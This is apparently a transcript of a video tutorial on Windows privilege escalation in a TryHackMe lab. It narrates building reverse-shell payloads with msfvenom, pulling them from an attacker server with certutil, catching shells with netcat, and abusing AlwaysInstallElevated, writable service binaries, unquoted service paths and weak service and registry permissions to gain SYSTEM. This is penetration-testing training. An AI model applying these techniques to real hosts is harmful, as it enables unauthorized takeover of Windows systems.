Hey, thanks for stopping by my channel. In this video, we're going to be covering some privilege escalation, specifically for Windows. I decided to break up this privilege escalation into three parts. This is going to be the most basic of all of the privilege escalation, and then we're going to be going through and exploiting what we find within the WinP's output. But later we're going to be doing some kernel exploits in the next video, and then we're going to look at the potato attacks and the printer spoofer attack, and then finally in the last video we're going to start looking at some of the vulnerable files and finding passwords or vulnerable programs that are installed on the Windows system. And that third part of the Windows privilege escalation is probably going to be the one that you need the most if you're wanting to get any kind of certification. A few weeks ago, I got a subscription to Proving Grounds and went through and did a bunch of the Windows boxes. I think I've done almost every Windows box and several Linux boxes put out by Offensive Security. And what I noticed with their privilege escalation is most of those boxes use some kind of vulnerable software. A lot of what you find on LinPs or WinPs is not actually going to be helpful, especially on the Windows boxes. And so in that third video, we're going to cover more of what I think you'll see on some kind of certification exams, but it's going to be important to be really well-rounded, really in all three parts of this Windows privilege escalation series if you want to be a penetration tester. In the first couple of minutes, once we get started, I'm going to show you how WinPs actually goes through and pulls down the information that it gives you in the output. And then we're going to walk through the output of WinPs, and we're actually going to exploit several of the vulnerabilities that WinPs finds for us. And I just want to apologize that when we actually start the video, I did not realize that I had adjusted my mic and I had it setting closer to my keyboard than normal. So for about the first 5 minutes, you're going to hear some tapping, and that is me typing, but it does go away once I realize what I've done and I do fix it. So let's go ahead and jump into it. So before we get started too far and we start looking at the output of LinPs, I wanted to show you a couple of different resources that you can use. One is this one right here, Shushan 747. This is a privilege escalation enumeration cheat sheet, and then also Payloads All the Things has one, and theirs is really long and pretty in-depth, so you can choose which one you like. I'd recommend as a beginner to start with Shushan, and these links will both be in the description down below. Very simply, what you can do is copy these little one-liners and paste them in over here, and it will give you an output. And so we're going to see some of these in the future. When we run LinPs, this is basically what it is running in the background, and it is going to give us the output in color so that way we don't have to look through all of this. So you can copy this and query the registry for passwords, which we will see in the future as well. So these one-liners are basically what WinPs is going to be running for us, and we're going to be looking through the output. I just wanted you to know that there is ways out there to do this manually without WinPs, because every now and then you will come across a box where you're not able to get WinPs to load or to run, and you can still do the enumeration manually with one of these cheat sheets. So with that, let's go ahead and get set up. Here we are on the Try Hack Me webpage, and we are going to be doing some Windows privilege escalation. We're going to be working on this specific set right here. There are 3 different sets of Windows privilege escalation, and I think we're going to work through each one of them, but this one is the one we're going to do first, and there is quite a few different Windows escalation paths. We're not going to do all of these, but we're going to do the ones that I think you probably need to know the most. And the ones that we skip over, you can go ahead and work through on your own, and maybe we'll come back to them. But the first thing you need to do is connect your VPN and then RDP into the Windows box that we have and get a reverse shell. So I'll walk you through how to do that. We're going to just copy that, paste it in here, and it will go ahead and launch for us that Windows box. And then the next thing we're going to need to do is make a reverse shell. So we'll go msf venom, and we need this to be exe, change our port to 10.2.1.182, and we're not using Java. We're going to be using Windows. I think it's x64 shell reverse TCP like this, And we can go ahead and make this. This was not the right directory that I wanted to make this in, but that's okay. Guess we'll just transfer it over from right here. And it tells us our final size right there. Not sure why I'm getting all of those outputs. But if we ls, we now have the reverse shell right here. I'm going to remove that file.txt. So now we need to move over our reverse shell. So we can go sudo python -2, enter our password, and now we're listening on this host, and we can come over to our client, our Windows client, and go cmd to open up a command line. And now that we have this open, we'll cd to the desktop. So we'll say cert util -url cache -f -split http //10.2.1.182, and then we called it reverse.exe, and we'll see if this pulls it over. We should see it pop up over here, and there it is. And now we can close out of this, and we can go netcat lvnp, and I think we made it on port 444. And now if we execute our reverse.exe, we should get a shell over here. And I spelled it wrong, so we got our reverse exe, and we have our shell over here. So now that we have this over here, you could do everything from over here if you wanted, but I find that this is a little more laggy than if I just type over here and run my commands. And so one of the things that we're told to do in the instructions is, well, we already got a reverse shell, is to run a file that's already on this box to look for our privilege escalation paths. And so we have this exe right here. I'm not going to run this. We're going to run WinPs because that's more realistic, and that's what we're going to be doing in the real world. I've actually never ran this file, so I don't even know what is inside of it, but we're going to run WinPs. So you can actually go to Google, this first one right here, and you can go down to the release page, and you would grab WinPs Annie.exe right here, and you can download it. I've already downloaded it, and I've changed the name to win.exe, and it's inside my tools, which is currently running this RDP, so we're not going to be looking at it. So we'll just go ahead and transfer it over. So what I will do is cd to my desktop and tools, and if we ls, we have it right here. And so now we'll set up our Python listener again. And now that this is hosting up the file, we'll grab this win.exe and run it. So we'll do the same thing we did before, cert util -url cache -split -f http //10.2.1.82/win.exe. And that should grab the file, and we can go dir, and it tells us that we have it right here. Now we're going to go ahead and run this by running the same way we ran the reverse shell win.exe, and I'm going to let this run, and then we'll walk through it once it has finished. Okay, so I believe that WinPs has gone ahead and ran, so we'll go ahead and start looking through these, and we're going to look through these in the order that we find them on WinPs, not necessarily the order that they are shown to us right here. So we're going to do these out of order, at least the first couple, so that way you can see what it's like to actually scroll through WinPs and read the output and look at what's available first rather than me just jumping and showing you, because you need to get used to reading the output and understanding what is here. So we'll go ahead and start scrolling through here, and we can look at Watson. A lot of these exploits from Watson are going to be kernel exploits, and we can come back and try these later, but we're going to skip over these because some of them won't work and some of them take a really long time to actually try and pull off. And then we're just going to get some basic information about the Windows system. We see Laps is not installed, and we have this cached credentials right here. So if you open this up and look at this, we're not actually going to cover this right now because we're going to see that you need Mimikatz right here. We're going to extract the passwords with Mimikatz, and for Mimikatz, you really should be system in order to run this. But if you look at this, you're querying the registry, and you can actually look to see how it's making this query, because what we're going to see here in a second is going to look really similar to this, only we're going to be using the Microsoft installer to run our exploit. So you have this right here, you can read through it and learn about it, but we're not going to be using that right now. So you have a cached logon accounts, and it tells us that there's no AB detected. This would be really bad if it was in the wild. And we can see right here, any local account can be used for lateral movement, which would be really good for us if we were on a network. And then we keep on scrolling down, and we see we have this always install elevated right here. Now, if we come over here, we can see this is one of the things in the registry we are looking for. And so in order to grab this, you wouldn't have this laid out just like this in the real world. So we're not actually going to use this, but we have this registry always elevated right here. And we can come back over here and open up Hack Tricks right here, open in a new link, and we're going to have something that looks really similar. So if we wanted to, we could make this same query like we were shown over here inside of Try Hack Me. So you could just highlight all of this, and we could make this query over here. I don't really want to scroll all the way down, so I guess we could come over here and do this. And you can see our output, which we have this OX1, which it actually tells us about over here. Note that both of these are set to OX1. So we have this exploit we can run. That's why WinPeas found this for us. So we'll come back over here, and it's going to tell us what we need to do. We need to make a interpreter payload right here. So we have this MSF Venom payload that they tell us we can use right here. I actually don't like this way, the way they give us this payload. So what we can do is use this payload right here, and we'll come back over to our tools, and I guess we'll make the payload right here. So we can leave all of this. We can leave the port, and we can change this to 10.2.1.182, which is going to be whatever your IP address is. And then we can create this. This looks exactly like what we made when we made our reverse shell. Only difference is instead of an exe, we're going to be using this Microsoft installer extension right here, and our port's different. So we can go ahead and host this file up, and we can grab it over here on our Windows machine. We still have our reverse shell, and we do. So we're going to run the cert util -url cache, and if you haven't noticed yet, you should go ahead and try and memorize this. Split http //10.2.1.182/ and I don't remember what we called this. We called it reverse.msi. Just copy it so that way I don't have a typo. And that should go out and hit our server and grab that. And now we can run it, and we're told how to run it right here, but just for the sake of like actually walking through this and pretending like we don't have the answer sheet, we can come back over to Hack Tricks, and if we scroll down a little way, they actually tell us how to run this, and then we need to run this with our path. So we can copy, I think we're actually in the users right here, so we can paste, and then we are the user, and this is inside of desktop, and we should be able to run this, but we will need another netcat listener, and it is on port 53 is where we made this payload to listen at right here on port 53. And if we run this, hopefully we get our shell back, and we didn't. So let me see what I did wrong. I did not put in our actual file to execute. So we can paste this / and then we need to put in our reverse.msi right here. And that went awfully fast, but it worked for us. And so now we should be a system. If we say, who am I? It tells us we are system. So that is how we would elevate if we see that always elevated from our WinPeas output back here, just like this. So that's pretty simple. All you would need to do is open Hack Tricks and basically just follow along with what they say. So that is the first one that we come across in WinPeas, and now we will continue looking and see what we can find. Okay, so let's go ahead and keep scrolling through here. We're going to see NTML settings, nothing helpful, and we'll keep scrolling through here. We have user information, and this is our RDP session. Keep on scrolling through here, and we have this file permissions right here. We also see this DACLS. We'll do this one first, and then we'll come back and do this modifying changes. So we have this file permission, this file perm service exe right here, and it tells us that we have file permission, everyone, all access. So if we do the same thing we did before and open this up, it will tell us what we can do with it. And so we can run this right here. We can put the service name, and then we can tell it that we want it to run it. So we need to move our reverse shell into the path because everyone has the ability to write to this. So what we can do is come back to our bottom here, and we can type in our copy and then our current path to our reverse shell, which is on our desktop. So we can copy this, paste, and I think we called it reverse.exe, and we'll just set up a netcat listener over here on port 4444 because I think that's what we made our original payload on. So I think this is the port we made our original payload on. We will find out. So we want to copy that, and now we want to put it in the actual file path. And I guess we can scroll back up and try and find it right here. And so you can just copy this completely as it is with the quotations. Go all the way back down, paste this in, and then we tell it, yes, we want to go ahead and run this like this. And it says that it copied it, and now we should be able to start this service, and it should give us a shellback as long as we are listening on the right port. So now we can tell it net start file perm, and then what was that service? MSVC tells us that we have this wrong. I forgot an E right there. So net start file perm SVC, and it should be running for us and going through that path, and we get a shell back. And if we do who am I, we are system. So now we are root on this box again. So that is how we would abuse this file path that is writable to everyone. We would write to it, and then we would execute the file. You can think of this kind of similarly to Linux with the bin bash. We're putting something inside of the path, and then the file gets executed when it tries to actually execute this right here. And it gives us root because it is being run as root, or as system in this case. So with that, we'll go ahead and check this one out next. We're going to go ahead and do this unquoted service path, and then we'll do this DACL service right here. And they're going to be done in a pretty similar fashion. So the unquoted service path is one you're going to hear a lot about when you are thinking about Windows privilege escalation. You'll see it every now and then, but it's really not that common, at least in the world of CTFs. So we'll go ahead and do this unquoted service, and I like how they named it unquoted service path. And so you have this unquoted service path, and if we stick something right here with the name common, it is going to hit anything with the name common, and it's automatically going to execute it. So we're going to make a file, and we're going to name it common.exe, and we're going to even use the capital C so that when we restart this unquoted service right here, it's going to automatically run all the files inside of this path. And because it's unquoted, we're able to inject into it our own file. So what we're going to do is we're just going to move our reverse shell because we already have it on the desktop, I think over here. So if we type in dir, we have our reverse.exe right here on the desktop, and we're just going to move it over into this file path right here. So you can actually, we'll come back and copy this in a second. So what we will do is we will type in copy, and we're wanting to copy this reverse.exe from our current directory. So we'll just type in copy, and then we can say copy reverse.exe, just like that. And then we're going to want to make a quote for the file path that we're moving this into. So we can copy this so that way we don't have any typos, just like that. And in here, we're going to want to rename this reverse.exe to common.exe, remembering that we want it to have the same start right here to this common, so that way it automatically executes our file for us. And then we can close this quote off, and that looks right. So that should go ahead, and it tells us that it copied the file over, and it should have saved it as the common.exe. And now at this point, we will want to net stop, and I'm going to just copy this right here to avoid all typos, and we can run that, and it's going to tell us that it is not started, which is probably what it's going to tell you as well. And then we can go net start and then paste that in there and run it. And I did not start up a netcat listener for that reverse shell, so it did not work. So I'll just copy this, paste, rerun it, and hopefully we get a shell over here, and we do. And who am I? And we are authority system. So what we did, just remind you again, is we have this file path right here, and it tells us it has no quotes and there are spaces. If you have spaces, like in a Kali machine, a lot of times it just isn't going to work unless you have it quoted. But in Windows, you can name files and directories without a quote. And if we can inject something in here and then we run the service that is automatically going to go through the file path, it's going to hit our reverse shell that we were able to put in here, and it's going to execute it as long as it has the start to one of the file names or some other kind of executable file. So we put it in here and it goes through this path and it executes everything in the path as the authority system as root, and it gives us back a shell over here. So we can close out of that, and we can come back over here and we can look at this one right here. Okay, so we are right here, and if you remember, we already opened this up and it is right here. And so we're still looking in the permissions area, and what we're going to do is something very similar to this right here. Only difference is, instead of putting this in a start, we're going to put this in the bin path. So this SC right here, if I remember right, it just is a system service that is ran on Windows. Sometimes you'll see it as the sc.exe when we want to do some kind of command on Windows systems. You can actually Google it, and I'm sure you're going to get a lot better explanation of what this SC does, but sometimes you'll see this as sc.exe. And what we need to do in order to modify this service is very similar to what we see right here. So I'm just going to go ahead and copy this so I have it to my clipboard. And we're back over here on the user desktop. So what we will do is type in this scconfig. We're going to paste in what we just copied, and then we're going to tell it we want this in our bin path. And then we're going to put our actual reverse shell in the bin path, which is inside of this directory right here. So we'll copy this, paste this in, and then we want it to run our reverse.exe. So we should be able to come back over here, start our netcat listener, close off our quote, and see to make sure that it says that it was successful in saving it. And we can run the same as we did earlier, which is our net start. And then we want to start our service path, which is right here. So we can paste that in, and hopefully that runs and we get a shell back over here. So I think you should be starting to notice a similarity. So the reason all three of these exploits, this one right here, the file permission service, and the unquoted path, these are all labeled under the hat tricks right here as interesting services, and we have this non-Microsoft, and they're all in this one URL because they're very similar. What we're doing is putting a file inside of one of these paths or directories that the Windows machine is going to execute as the root user or the NT authority system. And all we have to do is listen over here and restart the service. Because we're able to restart the service, it will go through and run this as NT authority system, and it will give us back a shell. So these are all very similar in the way they run, and you can go and read more about them. I think they're pretty simple to understand and pretty easy to run. You're not going to see these very often in CTFs because they're too simple. A lot of times when you're doing some kind of Windows privilege escalation, even on a certification exam, you're going to find some random file or some vulnerable service that WinPs is not going to pick up. So with that, we'll go ahead and look at the next vulnerability. So I think we'll do a few more of these really easy privilege escalations, and then we'll move on and we'll skip ahead to some of the more in-depth ones. So we will, at this point, we can just move on and look at the weak file permissions, which is just the one after our unquoted service path that we just did. And you can see this reg service. There's actually quite a few privilege escalations you can do with this service right here, but this one is not very far down in WinP. So if we just scroll down a little bit, we get this right here, looking through service registry, and we get this interactive full control. So this is going to be pretty bad. So we can come over to look at what we have here, and we can actually just hit our command find, and what we're going to end up doing is adding in our reverse shell, and we're going to do the same thing we did before with the net start, and we're going to run the reg service, and it's going to give us a reverse shell. So what we'll do is just copy this right here. I'm going to open up a file, so we'll close out of this. We'll open up a file and modify it right here. So we have this reg add, and we're going to add in to the service name that we're going to be modifying, and that is the reg service, and the path to the new binary, which is going to be our reverse shell, which we have typed out several times at this point. And we're going to just copy this, come over here. Can't remember if I copied the C. I did. Delete this, and it now has the path. So we should be able to copy this and run it over here, and it tells us the operation was complete. And now we can do a net start reg service, the SVC, and we need to be listening on a shell. So we'll close out of that. We'll be listening on a netcat listener to get a shell, rather. We'll run it, and we are system, if I can type right. And there we are. So all we ended up doing was abusing this right here. Since we had full control of this registry service, we are looking to see what permissions we have. Now this registry service is something that we can query, and I'll just show you. In my notes, I have a whole bunch of different ways to query the registry service, and you can actually get these notes on GitHub. That's where I found them a long time ago, and you can just paste these in. If you actually go over to my complete ethical hacking course, I actually walk you through looking for passwords, and there's a bunch of different one-liners you can paste in here and see if you can pull them down. And I actually think this machine is vulnerable and has stored passwords that we are able to find, which we'll look through later. But the registry service is something you're going to want to look at to see if you can abuse. So if we run this one-liner right here, I've actually seen this a few times on CTFs where you just sit here and you look through like these users, and you can read over here and find passwords. And I'm sure that this box, because it's vulnerable every direction, if you look through here, eventually you will come across a password. And I'm actually pretty sure that this is one of the future vulnerabilities that we're supposed to look for. Okay, and that concludes part 1 of our Windows privilege escalation course. So if you're interested in the next couple of courses, you can go ahead and subscribe. We will be putting those out in the next couple of weeks. Thanks for watching.